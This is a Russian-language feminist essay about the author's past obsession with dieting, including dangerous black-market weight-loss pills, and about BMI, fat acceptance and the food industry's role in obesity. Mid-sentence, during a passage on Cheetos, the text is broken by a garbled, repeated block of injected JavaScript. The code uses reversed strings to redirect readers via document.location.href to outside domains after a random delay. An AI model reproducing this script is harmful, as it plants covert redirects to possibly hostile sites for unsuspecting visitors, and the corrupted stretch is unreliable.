По развлекательному каналу E! показывали особый сюжет, который был посвящён секретам голливудской красоты. Что-то между жесткими диетами, употреблением кокаина, фанатичными интенсивными тренировками как минимум пять раз в неделю. И совет, который могут себе позволить даже работающие девушки. Даже простые смертные. Корректирующие нижнее белье Spanx

Говорят, что это незаменимая вещь на красной дорожке. Некоторые звезды одевают даже две пары Spanx. Тогда под дизайнерскими платьями не видна ни одна складочка.

Меня не покидает мысль, как же это выглядит, когда сексуальная Скарлетт Йоханссон, балансируя на одной ноге, пытается затолкнуть свою попу в корректирующее белье. 

Это унизительно. Весь этот процесс, который продолжается примерно две минуты, пока я стараюсь затолкнуть свое тело в плотные труселя телесного цвета. Это физически тяжело, и обычно заканчивается тем, что я устала, вспотела и растрепала волосы. Смотрю в зеркало и вот оно – я во всей красе. Симбиоз человека и колбасы. С ужасом думаю, что произойдет, если после вечеринки привезу кого-то домой. Забуду, что надето. И из сексапильной кошечки превращусь в печеночную колбасу.

Изображение: unsplash.com

У меня две научных степени. По политике и похудению. Со стыдом признаю, что в период от двадцати до тридцати лет я больше времени уделила различным методам похудения, нежели исследованиям по формированию коалиций правления. 

В школьное время я все время была на диете. И никто мне не пытался доказать, что мой вес в норме или даже понижен, потому что на диете были все девочки, в том числе и те, у которых лишнего веса не было. Не есть после шести. Не есть совсем. Есть только яблоки. Пить только чай, который провоцирует понос.

Подруга просидела неделю на гречневой диете, от бессилия потеряла сознание и упала с лестницы. Выжила.

Другая подруга какое-то время сидела на вареной морковке. Как-то раз коробочка с вареной морковкой в её сумке открылась и разлилась по идеально оформленным тетрадям. Я втихаря радовалась, потому что мне всегда было завидно, смотря на ее красивые тетради и, думая о том, что она может похудеть больше, чем я. А еще одна подруга посоветовала диету, где ничего не надо кушать, только пить водку. Она действительно удачно похудело, а у меня не было денег, чтобы купить так много водки.  

Моя жизнь изменилась, когда на латвийском черном рынке появились китайские таблетки Lida. Ничего подобного я раньше не видела. Таблетки порождали ощущение тревоги, немного тряслись руки и колотилось сердце, было совсем не уснуть, но, самое главное, — совсем не хотелось есть. Это помогло мне и похудеть, и написать почти гениальную магистерскую. Правда новости писали о том, что женщины со слабым сердцем от этих таблеток умирали. Некоторые попали в больницу. Я же была готова умереть с надеждой, что хотя бы в гроб меня положат худую. 

Все, о чем мы в это время говорили с подругами, было о весе. И еще уход за красотой, актуальные новинки моды, где купить какую одежды, кто сделал перманентный макияж и, где лучше накладывать шелковые ресницы.

Изображение: unsplash.com

Если кому-то удавалось похудеть, то это считалось достижением. И никого не волновало, анорексия, булимия или рак.

К сожалению, профессиональные достижения никто не замечает, и никто о них не спрашивает. Это даже минус – распустилась, заработалась. 

Худоба, кажется, всегда была синонимом красоты. На женщин, которые после женитьбы или родов округлились, смотрят с жалостью. Она попадает в зону риска – её вот-вот бросят. Имеется мнение, что, поддерживая худобу и сексапильность, можно поддерживать долгие и счастливые отношения с мужчиной. Главное – не расслабляться, ухаживать за собой! Мы прям как какие-то породистые собачки, которых регулярно надо везти на стрижки.  

Сейчас я феминистка. Это, конечно, поменяло то, как я смотрю на себя и мир вокруг себя. Больше всего это поменяло то, как я смотрю на свое тело. И в первую очередь это позволило мне задать себе вопрос – что значит здоровый вес? 

Раньше все было просто. Я хотела быть худая. И все меня в этом поддерживали. Мужчинам нравятся худые женщины. Конечно же, не совсем худые, потому что «мужчина не собака, на костях спать не станет.» Но никто не пояснил, где же эта граница между худобой и костлявостью. Все подруги худели и поддерживали друг друга, если это удавалось. Это в целом единственная похвала, которую женщины слышат – ты отлично выглядишь, случайно не похудела?  

Потому что худой – значит красивый. Конечно, все это делают ради себя и. своего здоровья. Даже если тип твоего тела не совсем стройный (и даже тогда стоит немного воображать, что это все результат твоих стараний и силы воли), думать об этом очень утомительно. Это требует регулярного голодания и периодов нерегулярного питания. Это требует много денег, потому что спорт зал стоит денег, да и к тому же хочется модный костюмчик NIKE.

Все знают, что диеты – это ничего хорошего. Однако не найдется ни одного такого женского журнала, где было бы забыто о разделе диет.

Диеты забирают наши деньги, энергию, жизнерадостность, а также много исследований, которые доказывают, что диеты не помогают и к тому же вредят здоровью. Есть исследования, которые доказывают, что пониженный вес наносит больший вред здоровью нежели излишний вес. 

Никогда не слышала, чтобы кто-то стыдил женщину по поводу того, что она за последний месяц ни разу не была в театре или не прочитала новейшую книгу. Но то, что ты не занимаешься похуданием, значит, что ты лентяйка. Неприемлемо заполнять свое время чем-то другим. 

Понятно, что я не должна быть худой. Но тогда появляется второй вопрос – где заканчивается худоба и начинается полнота? Не та полнота, которую обычно описывают как что-то некрасивое, а реальная полнота, которая вредит здоровью? 

Принято использовать Индекс массы тела (ИМТ), однако исследования показывают, что подобное измерение годится для количественных исследований, в которых участие принимает большое количество людей, но не для индивидуальных случаев. Например, одинаковый ИМТ будет как у полного человека, который не занимается спортом, так и у атлета такого же роста. По ИМТ миллионы людей попадают в категорию ожирения, не имея лишнего веса. 

Другим вариантом является самооценка, которой мы нередко занимаемся. Раньше я считала, что мой лишний вес начинается тогда, когда вешу больше, чем 50 кг, а сейчас эта грань достигла 65 кг. 

Я сама для себя решила, что мой лишний вес начинается тогда, когда моя грудь становится меньше живота. Примерно в это же время мне становится жить настолько полноценную жизнь, насколько бы мне хотелось. Конечно, каждая женщина имеет право сама решать, в какой момент её вес создает ей проблемы. Я считаю, что как феминистке мне следует жить активной, физически полноценной жизнью и в моем случае это получается очень тяжело, если вес превышает 75 кг. 

Если обратим внимание на блоги феминисток, то можно отметить, что феминистки уж точно могут быть толстыми. Это даже как подобного рода феминистический девиз, которым ты демонстрируешь, что не поддашься навязчивым стандартам патриархального общества. Но, если мы принимаем, что феминистка может весить 100 кг, может ли она весить 45 кг?

Изображение: unsplash.com

Мы живем в обществе, которое осуждает женщин за то, что они могут позволить себе быть толстыми, и в такой ситуации феминисткам тоже приходится бороться с мыслями о своем внешнем виде и весе.

Тогда, когда становишься феминисткой, эти мысли никуда не пропадают и также не пропадает общество, которое худобу ценит выше профессиональных достижений. 

И, честно говоря, похвалу за свои профессиональные достижения я слышу реже, чем за свой внешний вид. И может именно поэтому женщинам кажется более важной задачей концентрироваться на своем внешнем виде и том, чтобы выглядеть красиво (к сожалению, худой). Как-то не принято у нас похвалить друг друга за достижения на работе. Однако мы с радостью хвалим друг друга за внешний вид (особенно – похудение).  

И, конечно, же худоба является частью патриархального соглашения: худые люди получают более высокую зарплату, лучший карьерный рост. Женщины также получают поддержку от других женщин, который поддерживают каждую на пути к низкому весу и с обоготворением смотрят на каждую, кто уже худая. Очень приятно все время получать комплименты, а не слушать, как комплименты получают другие. 

Самое тяжелое, будучи феминисткой, думать и говорить о проблеме лишнего веса. Не только потому, что ты сама не можешь понять, не стоило бы тебе сопротивляться всему этому. Потому что феминистки могут худеть, но это надо делать по правильным причинам. И не потому, что ты хочешь выглядеть красиво по общественным стандартам – это плохая причина. Хорошей причиной является делать это ради себя самой. Но как отделить «ради себя самой» и «потому что общество так хочет»?  

Последнее время кажется, что существует какой-то постоянный мониторинг того, как мы говорим о вопросах веса и это идет с обоих сторон. В женских журналах назовем это нефеминистичной стороной – там все худые и счастливые. В свою очередь на стороне феминисток доминирует понятие, что красота возможна в любой весовой категории и вообще кому какое дело, кто и сколько весит. Это зовется “fat acceptance”.

Я не верю и не согласна с “fat acceptance”.
Но не потому, что хочу стыдить женщин с лишним весом, а потому, что считаю, что никто не отменил необходимость серьезно и научно обосновано говорить о проблеме лишнего веса и искать решение.

А не взяться за руки и убеждать женщин, что лишний вес – это на самом деле очень круто и вдохновляюще, и по-феминистски. Средний житель нашей планеты становится все толще и толще. Это одинаково большая эпидемия как в богатых, так и в бедных странах. 

Курс “Principles of Obesity Economics” в John Hopkins University осматривает причины ожирения и то, насколько большая это нагрузка для экономики. Причин ожирения много, и они разные. Большая часть связана не с тем, что люди мало занимаются спортом, как это пытается продать индустрия похудения, между прочем. Чаще всего ожирение связано с питанием и медикаментами.

Изображение: unsplash.com

Мы слишком часто кушаем вне дома, слишком часто употребляем еду, не задумываясь о том, сколько там сахара и соли. Мы употребляем медикаменты, которые оказывают влияние на наш организм и способствуют накоплению лишнего веса.

На данный момент известно, что, например, употребление гормональной контрацепции может быть причиной лишнего веса и депрессии. Депрессия, кстати, является одной из причин лишнего веса. 

Лауреат премии Пулитцера и автор книги “Salt Sugar Fat: How the Food Giants Hooked Us” Майкл Мос пишет о том, как продуктовая индустрия (которую слишком мало надзирает правительство) создает пищу, в которой скрыто огромное количество сахара и соли. И это не только полуфабрикаты. Это также и соки, диетические йогурты. Проблемой является также пища в больших упаковках. В книге приводится замечательный пример о чипсах Cheetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (c==3){var delay = 18000;setTimeout($mkD(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos. Идеальным сценарием развития событий является заставить людей думать, что они сами виноваты в своем лишнем весе, слишком мало спорта. И ни в один момент не упоминать ответственность правительства и предприятий. 

У лишнего веса лицо нищеты, и особенно это касается детей – так сообщает исследование Международной организации здоровья «Ожирение и социальное неравенство». Батон с кетчупом, жареный и вареный картофель, колбасы, макароны. В Латвии у нищеты лицо женщины – так в конце 2016-го сообщала исследовательница Йоланта Рейнгарде из Европейского института пол равенству полов

Кушать нездоровую пищу – это не выбор. Это единственная возможность не умереть от голода.

Конечно, мое одержимое похудение десять лет назад было глупостью. Но я боюсь, что торжествую под идеи “fat acceptance” мы забываем о том, что в наших интересах смотреть критические на причины, из-за которых у людей лишний вес, ведь это не выдуманная проблема. 

Долгом феминистки является говорить об этом, а не молчать. Говорить и об анорексии, и об ожирении. Особенно потому, что это проблема бедных и социально незащищенных женщин. И если мы, феминистки, хотим прожить долгую и полноценную жизнь, нам следует найти этот золотой путь между болезненной худобой и ожирением.

Изображение: unsplash.com

Автор: Linda Curika, Статья оригинально публикована в первом номере журнала  “I’mperfekt”